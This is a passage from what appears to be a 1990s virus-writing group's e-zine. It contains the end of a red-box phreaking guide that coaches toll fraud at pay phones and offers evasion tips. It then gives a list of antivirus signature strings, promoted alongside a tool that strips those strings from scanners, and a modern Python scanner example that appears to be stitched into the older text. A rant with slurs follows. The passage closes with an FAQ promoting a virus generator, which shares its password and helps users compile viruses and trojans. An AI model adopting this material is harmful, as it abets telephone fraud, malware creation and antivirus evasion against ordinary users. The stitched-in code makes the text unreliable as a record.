Sometimes after you hang up an operator will call the phone back
immediately, demanding some money, just as with a long-distance call.
See above for more details.


Where Should I Call From?
~~~~~~~~~~~~~~~~~~~~~~~~~
To be brief, you can use your red box from any true pay phone (red
boxes do not work on COCOTs [privately-owned pay phones]). Notice I say
"can" and not "should;" some phones are definitely better than others.
I've found that the best places to make calls from are government-owned
buildings. Why? These are public places, there are always real pay phones
there, and they are indoors, where it's warm in the winter and cool in the
summer. The best phones are isolated and have a place for you to sit while
you talk. I suggest you box from libraries, schools, municipal buildings,
etc., but in my opinion, high schools are best. Why? They're open late
for sports, etc. most days, even weekends, and you can blend in very easily
(if you're a teenager, you're a student; if you're older, you're an older
brother visiting your old school; if you look old enough, you're a parent).
Just go after school hours or it'll be noisy... Everyone has a favorite
place, just look around and find yours.


Will I Be Caught?
~~~~~~~~~~~~~~~~~
The following is an approximation of chances of being caught while using
a red box (and dealing with a live operator). You can assume that you
will never be caught when dealing with an electronic "operator" (ACTS).
Again, these are only approximations based on my experience. Remember,
though, even if you are caught, nothing will happen to you; just hang up
and try again. If they threaten to call the police or anything, just take
off, don't take any chances.

Range            % Detected
~~~~~            ~~~~~~~~~~
Local            5% or less
Long-distance    25% or less
International    75% or less


Closing
~~~~~~~
I've found red boxing to be a great form of phreaking. There's no risk
of being caught and you can call anywhere in the world for free -- all it
takes is a $30 investment and the willingness to put up with the hassles.
Plus, you get the added bonus of being able to laugh to yourself next time
you see some chump actually putting real money in a pay phone (gasp!).

Time to give credit where credit is due: I'd like to thank The Baron
and Guido Sanchez for introducing me to red boxing, and GarbageHeap for
telling me some of the tricks of the trade (come back to Chicago soon!).
Also, some of the information in the Autumn 1992 issue of 2600 magazine and
in various text files (e.g. RED.BOX, etc.) has proved useful to me, and was
referenced in this article. To everyone, your help is much appreciated.

Well folks, get going, and have fun with your new toy!

Nowhere Man/NuKE
===========================================================================
===========================================================================
SCAN v100 Virus Signatures
~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is a list of all scan strings extracted from McAfee's Scan
v100. Note: No self-mutating virus signatures can be automatically
extracted from SCAN due to problems with wildcard searches. If you need the
signature for a mutating virus not found on the list, please contact:
Screaming Radish@111:950/75 via 111:950/3.

[Note from Rock Steady: We have also included a file called MCAFEE.STR,
the product of Screaming Radish from Australia, that removes Scan
strings from any version of the AV program SCAN by McAfee. We have a
similar method for F-Prot, and F-Prot's VIRSTOP, which will be included in
the next InfoJournal. Check it out -- are you surprised how dumb this
program is? Remember the first MtE scare? SCAN used *VIRUS STRINGS* on it!
HAHAHA...dummies! And they claimed a 99.9999% hit rate...bite me.]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
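To make concrete what a "scan string" is and why a fixed-string list like the
one below cannot cover a self-mutating virus, here is an added example of a
minimal signature scanner. It is not McAfee's code and not MCAFEE.STR; it is
written for this article. It parses rows in the exact "[ID] Name hex" layout
of the list (the three sample rows are copied from the list, the header line is
included to show it is skipped), searches a constructed byte buffer for the
plain strings, and then shows that flipping one byte inside the string defeats
the fixed search while a pattern with a "??" wildcard byte still matches. The
"??" syntax is a hypothetical notation chosen for illustration, not SCAN's own
wildcard format; the buffers are constructed padding, not real samples.

```python
import re

# Constructed sample rows, copied verbatim from the SCAN v100 list in this
# article (ID in brackets, virus name which may contain spaces, hex string).
# The header line is included to show that non-row lines are ignored.
SIGNATURE_LINES = """\
Scan ID   Virus Name       Hex Signature
[WinVir] WinVir fc061e07be6e01bf8101
[Cf] Coffee Shop e03d0a03726cb8da33cd2180fca5
[Ping] Ping Pong - B a1f581a3f57d8b36f981
"""

# One row per line: "[ID] Name hex". The name is matched lazily so the
# trailing run of hex digits is always taken as the signature.
ROW_RE = re.compile(r"^\[(?P<id>[^\]]+)\]\s+(?P<name>.+?)\s+(?P<hex>[0-9a-fA-F]+)$")


def parse_signature_list(text):
    """Return a list of (scan_id, name, pattern_bytes) from a SCAN-style list."""
    sigs = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # header, separator and blank lines are skipped
        hexstr = m.group("hex")
        if len(hexstr) % 2:
            raise ValueError(f"odd-length hex signature on line: {line!r}")
        sigs.append((m.group("id"), m.group("name"), bytes.fromhex(hexstr)))
    return sigs


def scan_fixed(data, sigs):
    """Plain byte-string search, the only kind of match the extracted
    strings support. Returns [(scan_id, name, offset), ...]."""
    hits = []
    for scan_id, name, pattern in sigs:
        offset = data.find(pattern)
        if offset != -1:
            hits.append((scan_id, name, offset))
    return hits


def compile_wildcard(hexpat):
    """Compile a hex pattern where '??' stands for any single byte into a
    bytes regex. Hypothetical syntax for illustration, not SCAN's own."""
    if len(hexpat) % 2:
        raise ValueError("odd-length pattern")
    parts = []
    for i in range(0, len(hexpat), 2):
        tok = hexpat[i:i + 2]
        parts.append(b"." if tok == "??" else re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


def scan_wildcard(data, named_patterns):
    """named_patterns: [(name, compiled_regex)]. Returns [(name, offset), ...]."""
    hits = []
    for name, rx in named_patterns:
        m = rx.search(data)
        if m:
            hits.append((name, m.start()))
    return hits


def demo():
    """Show why a fixed string misses a buffer that differs by one byte,
    while a wildcard pattern still catches it."""
    sigs = parse_signature_list(SIGNATURE_LINES)
    winvir = next(p for i, n, p in sigs if i == "WinVir")
    # Constructed buffer: padding, the WinVir string, more padding.
    buf = b"\x90" * 16 + winvir + b"\x00" * 8
    # Constructed "variant": identical except for one byte inside the string.
    mutated = bytearray(buf)
    mutated[16 + 3] ^= 0x01
    mutated = bytes(mutated)

    wild = [("WinVir (wildcard)", compile_wildcard("fc061e??be6e01bf8101"))]
    return {
        "fixed_on_original": scan_fixed(buf, sigs),
        "fixed_on_mutated": scan_fixed(mutated, sigs),
        "wildcard_on_mutated": scan_wildcard(mutated, wild),
    }


if __name__ == "__main__":
    for label, hits in demo().items():
        print(label, hits)
```

The fixed search finds WinVir at offset 16 in the constructed buffer and
nothing at all once a single byte is changed; the wildcard pattern still
reports it. That gap is exactly why a string list extracted without wildcard
support says nothing about mutating viruses, and why a scanner that relies on
fixed strings alone has the weakness the note above mocks.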


Scan ID Virus Name Hex Signature
~~~~~~~~~ ~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[WinVir] WinVir fc061e07be6e01bf8101
[Cf] Coffee Shop e03d0a03726cb8da33cd2180fca5
[Otto] Otto 01a2ff0056b9600281c6
[J4J] Jump4Joy b8c7078bd889c1053936cd21
[I9] Ice 9 bf100303feb099b971008a25
[Tab] Tabulero 1e6a0003c32ea311002ea16c00
[Tab] Tabulero 8c06cf00be9c0033c08ed8bf8f43
[Roc] Rocko 8a865d02b93a022e30460045e2f9c3
[344] 344 8b9655028d9e2901b977003117
[Blj] Bljec 8bc82d0001a3fa00030e
[Grnt] Grunt 8b9657028d9e3001b9740031
[Cf1] Coffee Shop 1 836f12728e47120e1fb92006f3
[K4] KODE4 013b45017402ebef83c703
[OW] 384 be7002bf4b02b92500fcacaae2fc
[1014] 1014 83fbf07503e98b00b000
[104] 104 81c7030126803d06740a
[3Sht] Triple Shot bef11ab9e70cfdf3a5fc
[439] 439 8a84b301a20201e83d017413
[595] 595 fe873e008a973d0080fa01
[Abrx] Abraxas 81ed060181fc4144740b
[Acd] Acid bb32018a273226060190882743
[Agn] Agena 832e0200518b1e02002bdd
[Cpt] Capital 81eb0c018db71f01b98803
[Cybr] Cyber 8985a904a192002e8985ab04
[Cerb] Cerburus b86035cd21fc8bfb8d369502
[Chad] Chad 01240a3c0a7526b80300
[Coa] Coahuila 81ed30018db6f102bf0001b90300
[GTk] Telekom 8a9c2f058dbc2001b90f04
[R715] Rebo-715 bd04018b6e0081c5060183ed40
[Qo] Quake-o 81ed07018db61e01b9d4012e8134
[Les] Les 83ee038cc00510002e03
[Hi] Hi 83ed0633c08ed8813e6401
[Fune] Fune 83c6e9b90600fcf3a5ffe2
[Eof] End-of b80f03b104d3e8bbff0f03d839
[Fam] Fam fd0875f1f6de80e60132ed
[IOU] IOU 019c0eb80335cd21891e8601
[IT] IT 899ef8028c86fa02b41a8d96fc02
[Jeru] Jeru 8b1e010181c3030183eb708b872300
[J26] July 26 090189160b0152b41abae8fd
[P5220] Pas-5220 8b3e6a008a85200030e431d2
[Ngs] Nygus 8c9cfe028ed8b04e38068803
[S3d] Silver 3d b8931b50e8300259ff36c420
[PI] PI a11f013d0202740b8cc82d10
[NPX] NPox 2.0 b8cdabcd2181fbcdab74640e
[NPX] NPox 2.1 b8dcabcd2181fbdcab74640e
[Tim] TimeMark 892656008cd32e891e54008ccb
[Rkm] Reklama f3b980008cc0408ec08cdb3bc37404
[Soy] Soyun e97c05cd218cc983c110
[SPh] Swiss Phoenix 0726803eff04ff7501
[Wlk] Walker b8840050e92c07902e8c1eee07
[Mds] Madismo b85315ba72010500003b060200731a
[VM] VM 81ff8d00750304084757cf
[7S] 7thSon 81ed0301be8b0103f5bf0001
[BUG] Bogus 21b44febe8c35c2a2e2a00
[BUG] Bogus 1fa113048bc8b106d3
[BUG] Bogus eb69900002100038000100
[kiri] Hara bef6fd3a83c1fd7431803e
[LZ2] LZ2 fdbef80aebbc62e9c204000364e9
[LZ] LZ cdf1dae3629ae5f2febf48
[Fnz] Fri13-nz 16070183c203cd217217b440b96f
[For] Forger2 81ff78567507e9e900fe023714fc
[OW] Yukon b9970090ba0001cd21b457
[Stb] Stealth ff0e1304fac7064c00a700
[Msht] Mugshot 8b1e1304b9060083eb0731
[Mon] Monkey b90002fc268a05342eaae2f8
[Arag] Aragon 33c08ed8be137cb9a5018a3eba
[1554] Ten_bytes fe5a580306410383d2000306
[VTS] VTS 071e26a12c000bc075
[BKil] Boot Killer 33ffb90002f3a4ea1f000030061fb40d
[NOP] NOP 8bf4fba11304
[Klr] Kilroy 904b494c524f59
[H-2] H-2 eaa701c007444f53
[WM] Windmill 13048b04488904
[Curse] Curse fbb8c0078ed81eb8520050cbb840008ec0
[Filler] Filler f7e32d00108ec0
[MBug] Music Bug 8cc88ed88ec08ed0bc00f0
[Iboot] Israeli Boot cd13b80202b90627ba0001
[Ghost] Ghost 90ea59ec00f09090
[Mich] Michaelangelo a14e00a30c7ca113044848a3
[Stoned] Stoned ab004848a31304b106d3e0
[Emp] Empire ea9f01c007
[Mardi] Mardi Bros. d88ed0bc00f0fbe827
[EDV] EDV 751c80fe0175175b071f5883
[Alameda] Yale/Alameda b400cd13720db801
[Loa] Loa Duong fb8ed8fe0e1304a11304
[Teq] Tequila 8ed3bc007cfb33ff832e13
[Micro] Microbes 8ed0bc00f0fba113042d04
[A-Vir] Anti-Tel fb8ed8a1130448a3
[P-2] Print Screen-2 7401bf0300b92000f3a4
[PrtScr] Print Screen cd05fec8a26001c36f6e2d
[Korea] Korea 8ed0bcf0fffbbb1304
[Killer] Disk Killer c310e2f2c606f301ff90eb55
[Brain] Pakistani Brain c30002e2f4a113042d07
[Form] Form e8b2005a5e1f33c050b8007c
[Ping] Ping Pong - B a1f581a3f57d8b36f981
[Tboot] Typo Boot 241355aa
[Flip] Flip fbb80300e81f0006b8
[Joshi] Joshi f3a48cc00520008ec0bb
[1253] 1253 e4cd1333db2e8a36207d2e8a
[Atx] Anthrax 75ed061e071f32f6b9020033
[Invader] Invader 8ed8a11304b106d3e08ed8
[Queen] Queen's 8ed88ed0bc007c50fb33
[Invader] Invader b3ffb84342cd213d78567513072e
[Genb] Generic Boot fab8c0078ed8bf00
[OW] Leper baab03b43bcd21463b360d03
[OW] V1-Not b9ff00ba0000cd26b400cd16b80300cd10
[OW] 8000 7504b000eb02b001a2a43c
[OW] Lug e8d90159b88c0650e8d10159b8c306
[OW] Wake bb3f01908a27903226080190
[OW] Explode 8132f6ebd8b041e674ba40008edabb72
[OW] Dust ba9e00cd21b440b93200ba0001
[OW] Veng-B 8b1efc01b9fc008b16020283c262
[OW] Veng-C 8b1e8602cd217246909090890e8802
[OW] Veng-D 8b1eb302cd217246909090890eb502
[OW] Veng-E 8b1e2703cd217303e9dd00890e2903
[OW] Veng-F 8b1e390333c933d2cd211eb43f
[OW] Scribble ba6c03b43fcd21e82900
[OW] Banana b98b0090cd215a59b80157cd21b43ecd2159ba9e00
[OW] Leper baab03b43bcd21463b360d03
[OW] 102 ba6001b92600cd21721eb441ba5301
[OW] Blaze b91c01cd21b43ecd21b44fba0001cd21
[OW] 4915 bf3e040e5731c0509af90867
[OW] Silver3b f6b8030550e8eb0159e8a7000bc0740a
[OW] Secrets 3e01a006010ac0740b300743
[OW] Seneca 81f9bc077e1beb0190b42a
[OW] V1_1 891e70008c067200ba7400b41a
[OW] V2_0 891e82008c068400ba8600b41a
[OW] V1_0 891e5b008c065d00ba6500b41a
[OW] Aids92 48002648616802212020
[BFD] BFD bb9201eb2133c0be007cfa
[Pnz] Penza b9bc02f3a4061fb82135cd
[Mgm] Magnum b9be092e00042ef6ad
[Plu] Plutto 8b36010181ee00022e89360001
[Prm] Prime 2b01b94402512ea00701
[Sui] Suicide 81ed0701e80200eb41b9e803
[Ata] Atas b92b00b2aa8dbe6200fec23015
[Squ] Squisher ee11b844008ec0268a1db95401
[007] 007 2135a804020056051902280206
[132] 132 80f44b7549b8023dcd
[658] Something eb0e536f6d65746869
[Hck2] Hacktic2 80c6108ec25256b426
[V9] Virus9 890e6d01891671015b
[5856] Bow bec20903f3b94f002e
[vvf] VVF-34 8b1e03004081ebda0089
[1280] 1280 ba0005cd21e8d500bf5004
[2136] 2136 81c45809fb3b26060073
[VDV] VDV-853 8aa44f048dbc2001b92f0389
[Lam] Lamer 87060e0050cc589d5826
[Alb] Albanian e80000bb4c03538bfc33f6
[SilW] Silly Willy be15008b1ab9d00881e973
[Con] VCL e800005d81ed06018db61403bf000157a5a4
[Con] VCL e800005f83ef038d750de8
[Con] VCL e800005d81ed0601e8
[Dst3] Dest3 8b2e010181ed1fffe8e7ffbc4e02
[DTR] DTR 892624018cc88ed0bcf701
[Sk] Sk ee09b800008ed8893612030e1f
[Sk1] Sk1 ee090e1f0e0789366f04fcbf
[500] 500 21813e7c021e03754db452cd21
[Ash] Ash 81ed0b013ec6864702008db604
[C16] Com16850 892e333cc7061d3cffffe81301
[Hpp] Happy 8dbc190181c61201b9070090fc
[Lix] LixoNuke 015e568bfe33c08ed8c41e4c
[1182] Hellween 1182 014434803c00750c8b4401a3
[Tr2] Troi Two a384008c1e8600fbebb99c80fc
[Mch] Mocha bf0a01be96011e0e1fe8
[CV4] CV4 8d77cabf0001b90500fcf3a4
[GK] Geek 891ebb038c06bd03baa4
[557] 557 b8cdabcd213defcd7405e8
[Pia] Piazzola be6a04bf0001b4ddb900ff
[Rttl] Rattle 81ed03018d9e20018d968b013e8a8e0301
[Mex] Mexican 8a8e03013bda7405300f43
[Egn] Evil Genius b8cd7bcd2181fbcd7b747f33db0e1f
[Slv] Slovak 80bcfefc007406b8cb11
[Slv] Slovak 268a1d32d82e881d041147e2f3c3
[Req] REQ 01ba2a0003d78bdab41acd
[ZY] ZY 8b0ecb0281c100012e890ecd02
[Why] Why_win bb01018a27bb02018a07
[fizzle] DataFire fdb419cd2188466de8e2fe
[Davis] Davis b9a706fcacc0c8042e3206a706
[Cha] Chang c3fa0e1f33c08ec0bf0c00a1
[VA] VA b963068cc88ed8bf0000b8609f
[Gre] Green 8986160433ffc7454a0000
[1030] 1030 8ec033db26891fb880
[Chs] Chaser 8a160900bb38008a0732c2
[RMIT] RMIT f6e88b000bc0740ae851
[1661] 1661 fa8bece800005e81ee9a012ef684
[Ptch] Pitch ba220083c202061fb84725
[Mls] Malaise 81eb970483eb038cc82e
[Blus] Bloodlust be5d018bfeb92e01b37f
[Trk] Turkey 81eb29012ef687220101740f
[417] OMT b9890180352a47e2fa
[Topo] Topo fa0633c08ec0b82b002687060c00508cc8
[Ant] ANT 8a260701eb1290ac32c4aae2fa
[702] 702 5e3dc707751133c08bd88bcb
[205] 205 81eec900b44ebabf00
[1835] 1835 be9c0781ee030101de8904be9e07
[Krv] Krivmous c43e07010657c43e0b010657ff
[Lan] Lanc5476 8000179e83da00739581eb8b
[Lan] Lanc5882 80118b1e3a04c82ef726e904
[Lan] Lanc 9a0e02f000b8f401509a9e025e
[PA] PA-5792 3ec300417407803ec30042754a
[Cas] Casc1621 81eb070183bf010100740e8db7
[Sti2] Stink2 890e7801c6062d0101e8ab00
[Timid] Timid305 ba48ffc70655ff2400b409cd
[Tmd] Timid e80000832efcff09ba2a
[Eno] Enola 81fb91197503e91101b452
[Crk] Cracky 83ee0956fcbf0001b90500
[Mum] Mummy 04062e8c0665002e8c
[Che] Cheeba 8035264781ff6807
[Nina] Nina b90001f3a42d100050b8370150cb
[Dot] Dot Killer feb9400057f3a458ffe0be0001
[Sta] Stahl Platte b90001f3a48ec01ee9b101
[Er] Error 80fcdd7426b82135
[Sat14] Saturday 3e720201740c0106900083
[E92] Europe 92 83c62dbf000157a5a5c3
[Hre] Here 1eb8f000508becff5e0058
[Sdot] Star Dot b44fcd2173e5ff0641038cc8
[789] Dot-789 8ec0268b1e6c04891e6604
[Tum2] Tumen V2.0 e813feb4ffcd213d000074
[Key] Keypress fa2b06920383da00a39803a3
[T12] Thursday 12th 8a26290132260001be0301
[1992] 1992 d8b9a006bf03002ea0
[1992B] 1992B 2e8c0601008cc88ed8bf0300
[Mule] Mule 2e8a262f0e3e302743e2fa
[T3] Taiwan3 b8404bcd213d78567512
[T4] Taiwan4 b8504bcd213d34127510
[Fu] Fu Manchu b4e1cd2180fce1731680
[DAME] DAME be762d81f699548bdebec690
[DAME] DAME bbbaf4be84a78acb80e11f
[DAME] DAME b82846bab38df7ea2d3e21
[DAME] DAME bebaf4bb72c52b9c4810b106
[CMDR] Commander 33e4fbe87400
[Bmb] Bomber bb4d0830071e2bf68ede
[Boo] Boojum d8bb1700291e030029
[928] 928 bf000157be2b03b90300
[Mog] Mog bf0001fcffe7b40e
[880] 880 bb36008a0732c288
[Hrs] Horse cd200a0d4f4b
[334] 334 81ee0b01e80900e8
[Shld] Shield 8d0e2f0e2bcafcac
[2623] 2623 b8ab9ccd2f3d76
[LK] LK bf000189fe83eef0ff
[Em] Emmie 21c646950081f9bc
[Bt] Beast 8bf283c619bf0001b90300
[Qk] Quake 81fbba00744c891e
[981] 981 213d51907455be02
[1339] Mummy 01065c04b84242cd
[Ill] Ill ea2033ff3e8a86
[ZMT] ZMT 01b9fc00f3a4b8000159
[MPC] MPC a503b9140033f633c0
[Gls] Gliss 83bcdf04017402cd20
[Anto] Anto d87234b43fba7ffdcd
[Kzm] Kuzmitch b915038a5466309051
[Pch] Peach 53e8800050f3a6741e
[Imp] Imp 213d71197503e9bb00
[Sqk] Squawk 81bc30034d5a742e
[Troi] Troi b4fccd213ca57428
[Shd] Shield b9afb560b5b3a5
[Mnc] Munich 8d2614078cd903
[Emf] EMF 83ea03b99301cd21
[Bst] Busted 0732060601880743
[Mut] Mutating e82b004665617220
[Mut] Mutating 04d3ea83ea108cd903caba6d
[RusD] Russian 04d3ea83ea108cd903caba56
[914] V914 04bbde03b97f0058
[Bwr] Beware 8102578bd6fcb903
[1308] 1308 9047e2f8a97e39c3
[Sadt] Sadist 89261c008cc8fa8e
[DMB] DM-B bf00018bc7
[Crp] Creeper b8ff43cd218cd82d11
[1376] Hellween 81ee58015650060e
[Bob] Bob 81f9c907720680
[HS] HS b8874bcd213d636675
[MFC] Mface 3c75062ec6878a01
[DOD] DoDo 80fcab7502eb31b8
[DD] Dada 0e27062e891e2906
[Sr] Scream d8ff0e1304c51e8400
[Mlg] Malaga 01a2ca07a2db07a2
[K] Micropox 1ffd720db8f3c1cd
[JD] JD a45f57b82135cd2181
[CKs] CKsum 129c9d03079c4343e2
[109] 109 a4ba00feb41acd21ba67
[P45] P-45 b44eba270131c9cd2172
[Qt] Quiet 8cc801060c01ff1e0a
[Sh] Sh 1e650353e819005bb9
[Bry] Brainy e800005e56fa83c61b90
[CV] C 4d414effffba
[Crm] Criminal fc11742680fc12742180
[Hng] Hungarian c30eb000fad50a8807
[A16] August16 ba790203d7b41acd
[D-T] D-Tiny 07aba5b82125cd2107
[Def] Define 013dba9e00cd2193
[Mar] Marauder 5e81ee0e01e80500
[487] 487 f3bf0e0c0e579a16
[Psc] Psycho ba1603cd21726fb8
[Mn] Mannequin 813e670456441f75
[Dmo] Demolition 8d77178a04d0e0
[HW] Halloween b8b8009a44025701
[1244] 1244 b4e0fccd2180fc0375
[730] Ontario b86e4bcd213d545675
[Sov] Sov 5b0eb90001511e06b1
[1186] Lib1172 5351bb12018b0f1e5b03
[Rag] Rage ea83c5419055eb0d50
[El] Eliza 43b42acd2180fa0d75
[Bet] Beta 8bfeac32c4aae2fa
[472] ASP-472 d8bb980001d38b0f
[Plov] Plov 12b42ccd2180fa327c
[QML] QMU ed78060e1f0e07bf
[M11] MPS1.1 8b84d301408984d3
[D10] Day10 f347ba5448263915
[Tn] Tony b8b70050cb546f6e79
[JK] Joke 894e4972eab801438d
[SX] SX e70108fe0ee701be
[Bro] Brothers fc1e7c0fb413cd2f
[Sti] Stink 1f890f894f026107
[KU] KU-448 e7fe0fbe2c0190b9
[HrB] Hero-394 2e8384670310061e
[Hary] Hary bb3e0281eb2a018b
[Sqe] Squeaker fbe9b3feb000b4
[MPS] MPS 3.1 80f4a78865289047
[370] 370-B 213d55557503eb5b
[V-5] V-5 1620022e891600018a
[802] PC Flu e81f001febfefa
[M-123] Multi 8b44f4a300018a44
[Gr] Grapje f8b44732d28d36d901
[SCT] SCT b40eb202cd218cc8
[Barc] Barcelona b44a0e07cd21fcb80000
[LCV] LCV a4c31e071e8e1e260133
[1452] 1452 52e80602722ee891
[621] 621 81f9d0077503e9d2
[CRF] CRF 81ed0b01c6863d02
[RST] Reset 1fe800005d8daeaf
[Ph] PathHunt 81ed1405c3bb0501e8
[1701] 1701 81eb3101f6872a01
[408] 408 2e03015b53c33d4b
[Set] Semtex 8bf581c681028bfbb907

Screaming Radish/NuKE
===========================================================================
===========================================================================
A "Virus Group" or "Viral Warez?"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

As a long-time figure in the virus world, I cannot help but be disgusted
by some of the upstart new "virus groups" that have been appearing in the
last six months. These so-called virus writers are little more than warez
people who like to pass around viruses instead of pirated software. For
example, there's one Toronto-based group, who shall remain nameless,
which has its own couriers and ANSI makers. This is sickening. This
sweet-potato "virus group" consists of a bunch of geeks who get off on
mass-producing lame viruses, then typing up stupid .NFO files reminiscent
of INC and sending the package out around their local area. Too cheap
to call long-distance, too lame to phreak, these scum are largely confined
to Ontario, though they claim to have sites all over the world, which are,
of course, PRI-VATE, making them conveniently hard to reach. A good thing,
too, since these sites don't exist.

Then these faggots create their "own" virus-generator using code ripped
straight from PS-MPC and V.C.L. v1.0 (NOPed to defeat basic scanners), then
don't give credit where credit is due... This lame virus generator comes
with a nice snazzy .NFO file with huge, dripping ASCII drawings of their
group's name, nice boxes, credits, etc., straight out of an INC/TDT info
file. Not only that, but this group can't even decide its own name, which
changes from virus to virus, from newsletter to newsletter. (Youth,
youngsters, which is it? Why not just change it to "14-year-olds?")
The membership is also constantly changing. Most members don't do shit,
while a few write tons of lame trojans and viruses so that they have
something to brag about.

VGA artists? ANSI artists? What the fuck is this? Since when did a
virus require a graphic? It seems as though the group can't decide whether
it'll put out art or viruses...

And what sort of virus group has couriers? Are their viruses so awful
that they won't spread by themselves? Why do some members have personal
LD couriers to call across town? (Too cheap to pay for local calls? When
the split to 905 occurs they'll probably have to retire!) Why do they have
couriers, period? Next thing you know they'll have full-time doc writers.
Wait, they already do! I guess the people who run this group are too dead
to think of their own shit so they have to hire others.

If we're all lucky, these people MAY go away soon, VIPER themselves
into retirement. Of course there are always plenty of groups to rise up
and take their place. There are groups that form and then break apart
because no one knows how to program. There are those one-man groups of
people who are too repulsive to get anyone to help them... I guess these
groups serve one important function -- they make the real virus programmers
look that much better. Thanks guys.

Nowhere Man/NuKE
===========================================================================
===========================================================================
VCL v2.0 Update
~~~~~~~~~~~~~~~

"What's happening with VCL v2.0?" is all we ever hear today. Well, making
a product like VCL is not as easy as you may think! Let's compare.
VCL offers the user unique user-configured viruses; if you want it to
display a message, no problem; if you wish to add a routine, no problem.
It's very flexible, unlike other virus generators. The others simply
consist of one generic virus and simply block out unneeded parts to
generate your virus. The options it gives you are junk, like "Infect .COM"
or "Infect .EXE." Please, we don't need that, you could just hack out a
pre-existing virus if you want that. VCL is much more complex.

Nevertheless, we did it once with VCL v1.0, and we will continue to set the
standard with v2.0. The VCL kit is STILL undergoing construction. It will
feature a similar user-friendly environment, but the viruses produced will
be much better than before. The key word is STEALTH, v2.0 seeing the
addition of TSR viruses with numerous stealth options, some never seen or
tried before on a virus. Some of the new features of VCL v2.0 include:

o .COM, .EXE, .OVL, .SYS, and .BIN infection
o Floppy boot sector infection for 360k, 1.2M, 720k, 1.44M, and
2.88M diskettes
o MBR/partition infections for hard disks
o Directory-entry infections (similar to Creeping Death)
o Incredible stealth capabilities
o Cryptex(C) encryption generation, with support for MtE and TPE
o The NuKE Encryption Device, a mutation engine by Nowhere Man
written for use with v2.0
o Anti-anti-virus options
o Improved anti-trace options
o Increased user control over virus creation (more options!)
o New effects and conditions
o Enhanced environment

v2.0 will also differ from the initial release in that it is a team effort.
While v1.0 was entirely written by Nowhere Man, v2.0 is a complete NuKE
collaboration; besides Nowhere Man, Rock Steady, Screaming Radish, TäLöN,
and others will be working on the project. This allows us to expand VCL in
ways that one man alone could not hope to do, a perfect example of the
increasing cohesiveness of our group.

So, when will v2.0 be completed? We can't say for certain. Already several
deadlines have been broken, and we'd rather not promise any dates. All we
can say with certainty is that it will be released before the end of the
year. Keep a look out for it, and keep those suggestions coming!


VCL v1.0 FAQ
~~~~~~~~~~~~

Nowhere Man has provided us with a list of frequently asked questions (and
their answers) concerning VCL v1.0, which we present here. He requests that
no more bug reports be made, as v2.0 is being rewritten from the ground up
and so should be free of the bugs in v1.0. Comments and suggestions
are still welcome, however.


Q: HeY d00d cAn U TeLL mE ThE PW FOR YouR VCL pRoGRAM?

A: VCL v1.0 was password-protected for this very reason: to keep lame fucks
like this from using it. I gave out the password on every NuKE site, and
relied upon word-of-mouth to spread it from there. All "good" boards
would probably get it. However, seeing as v1.0 is now becoming outdated,
I've decided to be generous and tell the password to the world: it's
"Chiba City" (typed exactly as shown, capital Cs, lower-case otherwise).
Please do not mail me (or anyone else) for the password, 'cause I'll
just delete the message. (For those who are interested, "Chiba City" was
a random phrase taken from William Gibson's _Neuromancer_. There was
some conjecture on the nets a while ago as to what it meant. It's a city
in Japan where much of the book's action takes place.)


Q: Why do you include an IDE (Integrated Development Environment)? I mean,
using an IDE is akin to a walking person intentionally crippling his own
legs or a sighted person poking her own eyes out, right?

A: Fuck off, Dark Angel. :-)


Q: How come VCL doesn't install properly? I type in the password (Chiba
City), but it says I need to reinstall from an original copy, or it
hangs when creating VCL.CFG. I'm running with (whatever)...

A: Ok, there can be several causes for this. First, VCL v1.0 will not work
with Stacker, SuperStor, or any other on-the-fly disk compressor. Sorry,
but I was unaware of this problem for quite a while, since no one I know
uses Stacker. Run it from an unStacked disk. The other problem could be
caused by a bad version of INSTALL.EXE, the installation program. I have
released a new version of it under the name NEWINSTL.ZIP (some copies of
VCL will have the new install included). If you don't already have it
and you can't install properly, try using the new version. If all else
fails, only install to C:\VCL, that should always work. Otherwise, your
problem is a corrupted .ZIP or a hacked/pre-installed copy of VCL. Use
only the original version.


Q: Where's your source code, dude? I want to hack it so I can make my
"own" virus generator, but I can't seem to find it. Is it inside the
.EXE or something? Please help me soon, a new version of IVP is due
out next week! Also, why don't you include some ANSIs with VCL and
put in a .NFO file with elaborate ASCII setups, NoWhere Man?

A: (Nowhere Man draws a gun, raises it to the head of the blithering,
fourteen-year-old Torontonian fashion-tragedy standing before him,
and pulls the trigger. KABLYAM!)

Seriously, the source code to VCL will not be released to the general
public, it's for NuKE internal use only. Sorry. Nowhere Man will be
happy to answer any general questions as to the workings of the VCL
IDE/compiler, if you're wondering how it works.


Q: VCL won't compile my virus. How come?

A: There are several causes for this, too. First, you may not have your
assembler configured correctly (check it out from DOS, and be sure that
the Assembler string is set correctly), or you may not have an assembler
at all. If your assembler normally works, it could be that you don't
have enough memory for the compiler (VCL shells out to run it, and it
itself uses 200k, so if you have low memory when starting VCL, your
assembler will have even less). Try removing TSRs, decreasing buffers,
etc. if this seems to be the case. Your assembler might not be truly
MASM/TASM compatible, too. Specifically, A86 will not work with VCL
without user-modification of VCL-generated code. There is also the
chance that a routine that you've added has bad assembler code, causing
your assembler to abort, spoiling the process. There's also the very
remote chance that VCL has produced bad code (when there is low memory
a stray pointer sometimes causes VCL to go haywire and churn out bad
ASM code). If none of this seems to be the case, just Make .ASM and
assemble it yourself from DOS.


Q: HELLO CAN I HELP WITH YOUR VIRUS MAKER? I NO BASIC GOOD AND I WILL
MAKE U AN ANSI 2 IF U GET ME SUM CC#S AND CODEZ AND DRIVE TO
INDIANA TO GET ME FIREWORKS!

A: Go to hell, Suicidal Maniac!


Q: I've written a virus and it seems to crash occasionally or give odd
error messages. What's up?

A: Do you have Anti-Tracing functions on? If so, turn them off. I made
a small mistake in the anti-trace code which can cause system crashes
under some conditions. It worked fine for me, but on some setups strange
things can happen. If you don't have anti-tracing on, I'm afraid I can't
help you...just look over the code (if you know assembler) and look for
possible errors.


Q: Ok, I've written a trojan horse, but when I run it, it crashes. I've
compiled from DOS with...

A: Ah ha, that's enough! As I stated in the on-line help, when using
encryption on a trojan horse, you *must* compile from the VCL IDE. If
